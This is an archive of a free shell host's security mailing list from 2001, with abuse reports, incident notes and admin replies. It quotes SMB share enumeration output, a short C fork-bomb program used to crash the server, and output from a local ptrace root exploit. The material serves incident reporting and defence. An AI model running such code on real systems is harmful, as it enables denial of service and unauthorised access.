From arpadffy@polarhome.com Mon Aug 13 22:22:55 2001 Received: from sea (sea.polarhome.com [192.168.10.9]) by gate.polarhome.com (8.11.2/8.8.7) with SMTP id f7DKMto07470 for ; Mon, 13 Aug 2001 22:22:55 +0200 Message-ID: <010e01c12436$a89bc7e0$090aa8c0@polarhome.com> From: "Zoltan Arpadffy" To: Date: Mon, 13 Aug 2001 22:29:31 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Subject: [Security] Fw: SMB/Samba troubles ... Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.5 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: Thanks... ----- Original Message ----- From: "Ady R." To: Sent: Monday, August 13, 2001 10:06 AM > Subject: SMB/Samba troubles ... > hello, please take care about samba.. win9x machines are accessible from this shell accounts machine... > if this is not intended to be available to the general public, please disable samba from the public machine > and install ipchains/iptables rules to DENY/DROP such traffic > > c'ya > galaad2 signing off... :p > > p.s. mmmmm... shared printers... i wonder if it/they has/have enough paper for what i intend to do... > (just kidding.. :) ) > > > > $findsmb > > IP ADDR NETBIOS NAME WORKGROUP/OS/VERSION > --------------------------------------------------------------------- > 192.168.10.7 TOM [WORKGROUP] > 192.168.10.9 SEA +[WORKGROUP] > > > $smbclient -L tom > > Unknown parameter encountered: "ssl CA certFile" > Ignoring unknown parameter "ssl CA certFile" > added interface ip=192.168.10.1 bcast=192.168.10.255 nmask=255.255.255.0 > added interface ip=213.66.228.148 bcast=213.66.228.255 nmask=255.255.255.0 > > > Sharename Type Comment > --------- ---- ------- > CDROM Disk TOM:CDROM > WIN Disk TOM:C drive > IPC$ IPC Kommunikation mellan fj"rranslutna processer > > Server Comment > --------- ------- > > Workgroup Master > --------- ------- > > > $smbclient -L sea > > Unknown parameter encountered: "ssl CA certFile" > Ignoring unknown parameter "ssl CA certFile" > added interface ip=192.168.10.1 bcast=192.168.10.255 nmask=255.255.255.0 > added interface ip=213.66.228.148 bcast=213.66.228.255 nmask=255.255.255.0 > > > Sharename Type Comment > --------- ---- ------- > CDROM Disk CD reader (40x) > CD-RW Disk CD writer (2x4x24) > OTHER Disk OTHER Share > HP-COLOR Printer HP DeskJet 690C Series v11.0 > PRINTER$ Disk > HPDESKJET Printer HP DeskJet (Color) > FLOPPY Disk 3.5" floppy disk > WIN Disk > IPC$ IPC Kommunikation mellan fj"rranslutna processer > > Server Comment > --------- ------- > > Workgroup Master > --------- ------- > WORKGROUP SEA From leon@inyc.com Tue Aug 21 03:11:23 2001 Received: from smtp10.atl.mindspring.net (smtp10.atl.mindspring.net [207.69.200.246]) by gate.polarhome.com (8.11.2/8.8.7) with ESMTP id f7L1A0e10871 for ; Tue, 21 Aug 2001 03:11:22 +0200 Received: from FAD3R (user-11200kk.dsl.mindspring.com [66.32.2.148]) by smtp10.atl.mindspring.net (8.9.3/8.8.5) with ESMTP id VAA20930 for ; Mon, 20 Aug 2001 21:09:54 -0400 (EDT) From: "leon" To: Date: Mon, 20 Aug 2001 21:11:54 -0400 Message-ID: MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0010_01C129BC.BF888430" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Importance: Normal Subject: [Security] Warning! Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.5 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: This is a multi-part message in MIME format. ------=_NextPart_000_0010_01C129BC.BF888430 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Your system is busy scanning for people running vulnerable versions of RPC's. Is that allowed by your rules (using your system as a jump off point to stage more attacks.) Below is a snippet of the firewall log all times are EST. The firewall has blocked Internet access to your computer (TCP Port 111) from 213.66.228.148 (TCP Port 49850) [TCP Flags: S]. Time: 8/20/2001 7:22:42 PM ------=_NextPart_000_0010_01C129BC.BF888430 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable

Your system is busy scanning for people running = vulnerable versions of RPC’s.   Is that allowed by your = rules (using your system as a jump off point to stage more attacks.)  Below is a snippet of the = firewall log all times are EST.

 

The firewall has blocked Internet access to your = computer (TCP Port 111) from 213.66.228.148 = (TCP = Port = 49850) [TCP Flags: S].

 

Time: 8/20/2001 7:22:42 PM

------=_NextPart_000_0010_01C129BC.BF888430-- From arpadffy@polarhome.com Tue Aug 21 08:41:53 2001 Received: from sea (sea.polarhome.com [192.168.10.9]) by gate.polarhome.com (8.11.2/8.8.7) with SMTP id f7L6frR02353 for ; Tue, 21 Aug 2001 08:41:53 +0200 Message-ID: <000301c12a0d$517443c0$090aa8c0@polarhome.com> From: "Zoltan Arpadffy" To: References: Date: Tue, 21 Aug 2001 08:03:11 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Subject: [Security] Re: Unauthorized access attempts from your site Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.5 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: ----- Original Message ----- From: "Andrew Hamilton-Wright" To: "Zoltan Arpadffy" Sent: Monday, August 20, 2001 11:23 PM Subject: Re: Unauthorized access attempts from your site > On Mon, 20 Aug 2001, Zoltan Arpadffy wrote: > > > hi, > > > > Personally, I'm terribly sorry about it, but I can not take a responsibility > > for my users activity, however I can help to identify the suspect. > > No problem -- as I said, I'm not really worried, but is seems that someone > there is engaged in some funny business. > > I'm sure it is some "script kiddie", as the repeated attempts at the same > port don't look like someone with much of a clue to me . . . > > > > > Sun Aug 19 21:52:47 2001 Unrecognized access from 213.66.228.148:56443 to > > TCP port 111 > > > I trust that you can take this up with the individual involved? > > > If you can tell me what's the difference between CET (my timezone) and > > yours, then I can probably eliminate about 2000 users. > > But I can ensure you, that if it is proven, reported or seen that somebody > > from this system does some malicious activity. This person and whole his > > network finished his career at my site. > > Sure -- I am in EDT=GMT+5 (Toronto/New York), which put me 7 hours behind > you (at least according to my zoneinfo records). I take it you are in > the middle of Europe somewhere? > > > > This site if for educative purpose... everybody can hack me, but should not > > use my site to hack others. One guy had been banned already and I'm not > > affraid to kick other users who does not respect our rules. > > http://www.polarhome.com/hacker/ > > Yeah -- I read a little of your info on the site. Interesting stuff! > > Regards, > Andrew. > From arpadffy@polarhome.com Tue Aug 21 08:41:53 2001 Received: from sea (sea.polarhome.com [192.168.10.9]) by gate.polarhome.com (8.11.2/8.8.7) with SMTP id f7L6frR02356; Tue, 21 Aug 2001 08:41:53 +0200 Message-ID: <000501c12a0d$51ae3f80$090aa8c0@polarhome.com> From: "Zoltan Arpadffy" To: "Daniel Scheftner" , References: <000a01c129cc$9ea27a40$d4a51a42@ec.rr.com> Date: Tue, 21 Aug 2001 08:08:33 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0040_01C12A18.785FA3C0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Subject: [Security] Re: Read!!!! Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.5 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: This is a multi-part message in MIME format. ------=_NextPart_000_0040_01C12A18.785FA3C0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable hi, Personally, I'm terribly sorry about it, but I can not take a = responsibility for my users activity, however I can help to identify the suspect. If you can send me some closer time of malicious activity, I could try = to identify and kick out the user. Thaks a lot for warning. Regards,=20 Z ----- Original Message -----=20 From: Daniel Scheftner=20 To: legal@polarhome.com=20 Sent: Tuesday, August 21, 2001 1:05 AM Subject: Read!!!! I'm sick & tired of your server attempting to access my computer...... = GET THE BUGS OUT!!!!!! ------=_NextPart_000_0040_01C12A18.785FA3C0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
hi,
 
Personally, I'm=20 terribly sorry about it, but I can not take a responsibility
for my = users=20 activity, however I can help to identify the = suspect.
 
If you can send=20 me some closer time of malicious activity, I could try to identify and = kick out=20 the user.
Thaks a lot for warning.
 
Regards,
Z
 
----- Original Message -----
From:=20 Daniel=20 Scheftner
Sent: Tuesday, August 21, 2001 = 1:05=20 AM
Subject: Read!!!!

I'm sick & tired of your server = attempting to=20 access my computer...... GET THE BUGS OUT!!!!!!
 
------=_NextPart_000_0040_01C12A18.785FA3C0-- From arpadffy@polarhome.com Tue Aug 21 08:41:53 2001 Received: from sea (sea.polarhome.com [192.168.10.9]) by gate.polarhome.com (8.11.2/8.8.7) with SMTP id f7L6fqR02348; Tue, 21 Aug 2001 08:41:53 +0200 Message-ID: <000001c12a0d$51498a40$090aa8c0@polarhome.com> From: "Zoltan Arpadffy" To: "leon" , References: Subject: Re: [Security] Warning! Date: Tue, 21 Aug 2001 07:57:04 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_000A_01C12A16.DDEF9E40" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.5 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: This is a multi-part message in MIME format. ------=_NextPart_000_000A_01C12A16.DDEF9E40 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable hi, >Your system is busy scanning for people running vulnerable versions of = RPC's. >Is that allowed by your rules (using your system as a jump off point to = stage more attacks.) No it is not allowed... this kind of users will be kicked out. Thanks for warning. Regards,=20 Z ------=_NextPart_000_000A_01C12A16.DDEF9E40 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
hi,
 
>Your system is busy = scanning for=20 people running vulnerable versions of RPC’s.
>Is that allowed by = your rules=20 (using your system as a jump off point to stage more=20 attacks.)
 
No it is not allowed... = this kind of=20 users will be kicked out.
Thanks for=20 warning.
 
Regards, =
Z
------=_NextPart_000_000A_01C12A16.DDEF9E40-- From zoltan.arpadffy@essnet.se Tue Sep 4 12:44:53 2001 Received: from essnet.se (fwall.essnet.se [212.209.198.194]) by gate.polarhome.com (8.11.2/8.8.7) with ESMTP id f84Aiqa07171 for ; Tue, 4 Sep 2001 12:44:53 +0200 Received: by fwall.essnet.se via suspension id <119048>; Tue, 4 Sep 2001 12:44:17 +0200 Received: from tfsgw.essnet.se ([194.132.53.235]) by fwall.essnet.se with SMTP id <119041>; Tue, 4 Sep 2001 11:42:42 +0200 Message-Id: From: zoltan.arpadffy@essnet.se Date: Tue, 4 Sep 2001 11:41:03 +0200 To: security@polarhome.com MIME-version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 X-Mailer: TFS Secure Messaging /300000031/221110291/221041054/221001705/ X-Mailer: Version 4.61 Build 202 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by gate.polarhome.com id f84Aiqa07171 Subject: [Security] FW from guest Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.5 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: From polarhome guest user To root@gate.polarhome.com Date Tue, 4 Sep 2001 09:46:23 +0200 max user processes 32766 - from what i hear the box was forkbombed, and now you can see how. ------------------------------------------------------------------------ From polarhome guest user To root@gate.polarhome.com Date Tue, 4 Sep 2001 09:48:16 +0200 has a bunch of patches you may wanna apply that could stop this type of thing from happening, one of the applicable features is logging to syslog when a fork() attempt fails..... From vineshpatel@btinternet.com Wed Sep 5 18:54:45 2001 Received: from carbon.btinternet.com (carbon.btinternet.com [194.73.73.92]) by gate.polarhome.com (8.11.2/8.8.7) with ESMTP id f85GsiN11340 for ; Wed, 5 Sep 2001 18:54:45 +0200 Received: from [213.1.108.102] (helo=vineshpatel1) by carbon.btinternet.com with smtp (Exim 3.22 #6) id 15efwp-0001Cc-00 for security@polarhome.com; Wed, 05 Sep 2001 17:54:43 +0100 Message-ID: <000801c1362b$4a4f7720$666c01d5@vineshpatel1> From: "Vinesh Patel" To: Date: Wed, 5 Sep 2001 17:53:28 +0100 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0005_01C13633.AAFFB000" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Subject: [Security] (no subject) Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.5 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: This is a multi-part message in MIME format. ------=_NextPart_000_0005_01C13633.AAFFB000 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable i was wondering whether polarhome.com would be interested in letting me = run a half life games server. however, the file for the server is fairly = large (much above the 10mb quota) and would require some help from = polarhome, as there is a module which needs installing. ------=_NextPart_000_0005_01C13633.AAFFB000 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
i was wondering whether = polarhome.com=20 would be interested in letting me run a half life games server. however, = the=20 file for the server is fairly large  (much above the 10mb quota) = and would=20 require some help from polarhome, as there is a module which needs=20 installing.
------=_NextPart_000_0005_01C13633.AAFFB000-- From arpadffy@polarfox.com Thu Sep 6 15:37:19 2001 Received: from www3.aname.net (www3.aname.net [194.18.94.103]) by gate.polarhome.com (8.11.2/8.8.7) with ESMTP id f86DbIN23806 for ; Thu, 6 Sep 2001 15:37:19 +0200 Received: from sea (h229n2fls31o873.telia.com [213.66.228.229]) by www3.aname.net (8.11.6/8.11.3) with SMTP id f83KAWd14569; Mon, 3 Sep 2001 22:10:40 +0200 Message-ID: <004a01c134b5$83cd9da0$090aa8c0@polarhome.com> From: "Zoltan Arpadffy" To: Cc: Date: Mon, 3 Sep 2001 22:17:44 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Subject: [Security] cracked Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.5 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: gate.polarhome.com has been cracked. attack was not constructive and it was directly against gate's functionality. Attacker used PAM modules bug that it is not possible to configure /etc/security/limits.conf file with user environment limitations. This bug has been submitted to bugzilla several times (once by me), but RedHat didn't take it with high importance. Scenario: guest user logged in. guest pts/108 Mon Sep 3 10:44 - 12:56 (02:11) cmb5-152.dial-up.arnes.si writes a c program: #include main(){ system("/usr/bin/uptime"); while(1){ fork(); } } This program just overload the system... Normally /etc/security/limits.conf would easily stop the this kind of attacks with * hard nproc 100 ... but not the buggy PAM :-) Anyhow system with more than 3000 users was down. root From archangeljulian@hotmail.com Fri Sep 7 07:53:31 2001 Received: from hotmail.com (oe50.law14.hotmail.com [64.4.20.22]) by gate.polarhome.com (8.11.2/8.8.7) with ESMTP id f875rTN05081 for ; Fri, 7 Sep 2001 07:53:30 +0200 Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 6 Sep 2001 22:52:57 -0700 X-Originating-IP: [131.94.140.134] From: "Julian" To: Date: Fri, 7 Sep 2001 01:52:00 -0500 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0005_01C1373F.AF16D120" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-ID: X-OriginalArrivalTime: 07 Sep 2001 05:52:57.0843 (UTC) FILETIME=[5873E430:01C13761] Subject: [Security] dalnet irc server Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.5 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: This is a multi-part message in MIME format. ------=_NextPart_000_0005_01C1373F.AF16D120 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable [07:48] -NOTICE- *** Autokilled for [ma/web] Web Site or Server = Advertising is not allowed on DALnet. If you continue, we'll notify your = web provider and ISP. See http://kline.dal.net/massads/mup.htm [AKILL = ID:999838998K-c] (2001/09/07 00.33) Some jerk keeps using polarhome's free shell to advertise on = DALnet,getting our eggdrops to be klined :( Would be good if there was a policy to obey the irc server's rules under = the penalty of exclusion,as well as contact dalnet to let them know that = the mentioned hostmask is a shell,so they won't kline everyone,but just = the agressor. Thank you ------=_NextPart_000_0005_01C1373F.AF16D120 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
[07:48] -NOTICE- *** Autokilled for = [ma/web] Web=20 Site or Server Advertising is not allowed on DALnet. If you continue, = we'll=20 notify your web provider and ISP. See http://kline.dal.net/massad= s/mup.htm=20 [AKILL ID:999838998K-c] (2001/09/07 00.33)
 
Some jerk keeps using polarhome's free = shell to=20 advertise on DALnet,getting our eggdrops to be klined :(
Would be good if there was a policy to = obey the irc=20 server's rules under the penalty of exclusion,as well as contact dalnet = to let=20 them know that the mentioned hostmask is a shell,so they won't kline=20 everyone,but just the agressor.
Thank you
------=_NextPart_000_0005_01C1373F.AF16D120-- From zoli@polarhome.com Fri Sep 7 08:09:37 2001 Received: from alice (alice.polarhome.com [192.168.10.5]) by gate.polarhome.com (8.11.2/8.8.7) with SMTP id f8769bN08832; Fri, 7 Sep 2001 08:09:37 +0200 Message-ID: <003001c13763$9de36520$050aa8c0@polarhome.com> From: "Zoltan Arpadffy" To: "Julian" , References: Subject: Re: [Security] dalnet irc server Date: Fri, 7 Sep 2001 08:08:16 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0029_01C13774.3FDD8260" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.5 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: This is a multi-part message in MIME format. ------=_NextPart_000_0029_01C13774.3FDD8260 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Julian, as you could read our policy does not allow any destructiv activity, = specially remote, including IRC... If you could send some closer details to idetify the suspects, I could = act as hard as it had been decribed. Thank you for positive aproach. Regards, Z ------=_NextPart_000_0029_01C13774.3FDD8260 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Julian,
 
as you could read our policy does not = allow any=20 destructiv activity, specially remote, including IRC...
If you could send some closer details = to idetify=20 the suspects, I could act as hard as it had been = decribed.
 
Thank you for positive = aproach.
 
Regards, Z
------=_NextPart_000_0029_01C13774.3FDD8260-- From ozzy@gate.polarhome.com Thu Sep 20 11:47:23 2001 Received: from localhost (ozzy@localhost) by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id f8K1SGQ15130; Thu, 20 Sep 2001 03:28:17 +0200 Date: Thu, 20 Sep 2001 03:28:14 +0200 (CEST) From: Ventsislav Nikolov To: cc: Ventsislav Nikolov Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Subject: [Security] B - achieving root permisions from normal user account Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.6 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: ozzy@gate~/hack$ ./epcs2 bug exploited successfully. enjoy! sh-2.04$ exit ozzy@gate~/hack$ ./epcs2 ptrace: PTRACE_ATTACH: Operation not permitted d0h! error! ozzy@gate~/hack$ date Thu Sep 20 03:20:32 CEST 2001 The source of the local exploit is /home/o/ozzy/hack/epcs2.c Works the first time only after system reboot. Actually it is for slackware but obviously works on RedHat 7.1. ^_^ Best wishes! Ventsislav Nikolov From arpadffy@polarhome.com Thu Sep 20 15:07:24 2001 Received: from sea (sea.polarhome.com [192.168.10.9]) by gate.polarhome.com (8.11.6/8.8.7) with SMTP id f8K5d1E09769; Thu, 20 Sep 2001 07:39:02 +0200 Message-ID: <000201c14197$a6069180$090aa8c0@polarhome.com> From: "Zoltan Arpadffy" To: "Gareth Haynes" , , , "Norman Roa" , "Maykel Constantin" , "Wulf" , "Csaba Korponai" , Date: Wed, 19 Sep 2001 18:36:17 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0050_01C14139.F83D6900" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Subject: [Security] Re: IRC link Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.6 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: This is a multi-part message in MIME format. ------=_NextPart_000_0050_01C14139.F83D6900 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Gentlemen, some information just to move forward the negotiation process... 1. polarhome.com can not and will not change host or domainname...=20 explanation: polarhome.com is well established domain, and anyway it is = running with DNS forwarder (thanks dante) that is quite complicate and = responsible to maintain... 2. irc.polarhome.com will continue to use ircd server reason: it is a quite nice and configurable server (and I know it on = code level), from another hand 3 of you want to change to 3 different = servers the current installation. My opinion is: 1. for sure it is possible to connect different irc servers. 2. if it will be as complicate as some of you suggested (new server, new = names, new domains etc) then I would vote to keep as it is. Please, consider these statements as well. Regards,=20 Z ----- Original Message -----=20 From: Zoltan Arpadffy=20 To: Gareth Haynes ; cristi@confiance.deltanet.ro ; madalin@nimeni.org = ; Norman Roa ; Maykel Constantin ; Wulf ; Csaba Korponai ; = security@polarhome.com=20 Sent: Wednesday, September 19, 2001 12:00 AM Subject: IRC link hi, as you could see, users voted to connect to some BIG IRC network, but = as everybody knows, we don't have a good reputation because of free bots = etc... then let do "the small networks big connection" instead. Gentlemen, if you are interested, please send me your C/N records (regarding = irc.polarhome.com), including suggested passwords, with connection class = explanations etc, ASAP. Please note, that irc.polarhome.com is CNAME for gate.polarhome.com = that runs with DHCP IP address: it means that it is very likely to change sometimes as well as identd = response. Kind regards,=20 Z ------=_NextPart_000_0050_01C14139.F83D6900 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Gentlemen,
 
some information just to move = forward the=20 negotiation process...
 
1. polarhome.com can not and will not = change host=20 or domainname...
explanation: polarhome.com is well = established=20 domain, and anyway it is running with DNS forwarder (thanks dante) that = is quite=20 complicate and responsible to maintain...
2. irc.polarhome.com will continue to = use ircd=20 server
reason: it is a quite nice and = configurable server=20 (and I know it on code level), from another hand 3 of you want to change = to 3=20 different servers the current installation.
 
My opinion is:
1. for sure it is possible to connect = different irc=20 servers.
2. if it will be as complicate as some = of you=20 suggested (new server, new names, new domains etc) then I would vote to = keep as=20 it is.
 
Please, consider these statements as=20 well.
 
Regards,
Z
----- Original Message -----
From:=20 Zoltan=20 Arpadffy
To: Gareth Haynes ; cristi@confiance.deltanet.ro= ;=20 madalin@nimeni.org ; Norman=20 Roa ; Maykel Constantin ; Wulf ; Csaba=20 Korponai ; security@polarhome.com =
Sent: Wednesday, September 19, = 2001 12:00=20 AM
Subject: IRC link

hi,
 
as you could see, users voted to = connect to some=20 BIG IRC network, but as everybody knows, we don't have a good = reputation=20 because of free bots etc... then let do "the small networks = big=20 connection" instead.
 
Gentlemen,
if you are interested, please send me = your C/N=20 records (regarding irc.polarhome.com), including suggested=20 passwords, with connection class explanations etc,=20 ASAP.
 
Please note, that irc.polarhome.com = is CNAME for=20 gate.polarhome.com that runs with DHCP IP address:
it means that it is very likely to = change=20 sometimes as well as identd response.
 
Kind regards,
Z
 
 
 
 
 
------=_NextPart_000_0050_01C14139.F83D6900-- From arpadffy@polarfox.com Thu Sep 20 15:34:12 2001 Received: from www3.aname.net (www3.aname.net [194.18.94.103]) by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id f8KDYBE25547 for ; Thu, 20 Sep 2001 15:34:11 +0200 Received: from sea (h229n2fls31o873.telia.com [213.66.228.229]) by www3.aname.net (8.11.6/8.11.3) with SMTP id f8JGlUs32683 for ; Wed, 19 Sep 2001 18:47:30 +0200 Message-ID: <008901c1412b$d8855360$090aa8c0@polarhome.com> From: "Zoltan Arpadffy" To: Date: Wed, 19 Sep 2001 18:55:09 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0086_01C1413C.9AD6DBE0" X-Priority: 1 X-MSMail-Priority: High X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Subject: [Security] Fw: IRC link Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.6 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: This is a multi-part message in MIME format. ------=_NextPart_000_0086_01C1413C.9AD6DBE0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable ----- Original Message -----=20 From: Zoltan Arpadffy=20 To: Gareth Haynes ; cristi@confiance.deltanet.ro ; madalin@nimeni.org ; = Norman Roa ; Maykel Constantin ; Wulf ; Csaba Korponai ; = security@polarhome.com=20 Sent: Wednesday, September 19, 2001 12:00 AM Subject: IRC link hi, as you could see, users voted to connect to some BIG IRC network, but as = everybody knows, we don't have a good reputation because of free bots = etc... then let do "the small networks big connection" instead. Gentlemen, if you are interested, please send me your C/N records (regarding = irc.polarhome.com), including suggested passwords, with connection class = explanations etc, ASAP. Please note, that irc.polarhome.com is CNAME for gate.polarhome.com that = runs with DHCP IP address: it means that it is very likely to change sometimes as well as identd = response. Kind regards,=20 Z ------=_NextPart_000_0086_01C1413C.9AD6DBE0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
 
----- Original Message -----=20
From: Zoltan=20 Arpadffy
To: Gareth Haynes ; cristi@confiance.deltanet.ro= ; madalin@nimeni.org=20 ; Norman=20 Roa ; Maykel Constantin ; Wulf ; Csaba=20 Korponai ; security@polarhome.com
Sent: Wednesday, September 19, 2001 12:00 AM
Subject: IRC link

hi,
 
as you could see, users voted to = connect to some=20 BIG IRC network, but as everybody knows, we don't have a good reputation = because=20 of free bots etc... then let do "the small networks big = connection"=20 instead.
 
Gentlemen,
if you are interested, please send me = your C/N=20 records (regarding irc.polarhome.com), including suggested = passwords, with=20 connection class explanations etc, ASAP.
 
Please note, that irc.polarhome.com is = CNAME for=20 gate.polarhome.com that runs with DHCP IP address:
it means that it is very likely to = change sometimes=20 as well as identd response.
 
Kind regards,
Z
 
 
 
 
 
------=_NextPart_000_0086_01C1413C.9AD6DBE0-- From apache@gate.polarhome.com Thu Sep 20 16:08:52 2001 Received: (from apache@localhost) by gate.polarhome.com (8.11.6/8.8.7) id f8KE8q511371; Thu, 20 Sep 2001 16:08:52 +0200 Date: Thu, 20 Sep 2001 16:08:52 +0200 Message-Id: <200109201408.f8KE8q511371@gate.polarhome.com> To: ozzy@polarhome.com Subject: RE: [Security] B - achieving root permisions from normal user account cc: security@polarhome.com From: zoli@polarhome.com X-Sender: phpop at www.polarhome.com X-Sender-IP: 212.209.198.194 Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.6 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: hi, I checked it and it does not like to work... BUT if you read carefuly the instrucyions tr sais: * This exploit does not work on 2.4.x because kernel won't set suid * privileges if user ptraces a binary. and if you check: root@gate~# uname -nrs Linux gate.polarhome.com 2.4.3-12 It will eexplain... This kernel is not bug free at all, but that one is not the right exploit. Regards, Z >ozzy@gate~/hack$ ./epcs2 >bug exploited successfully. >enjoy! >sh-2.04$ exit >ozzy@gate~/hack$ 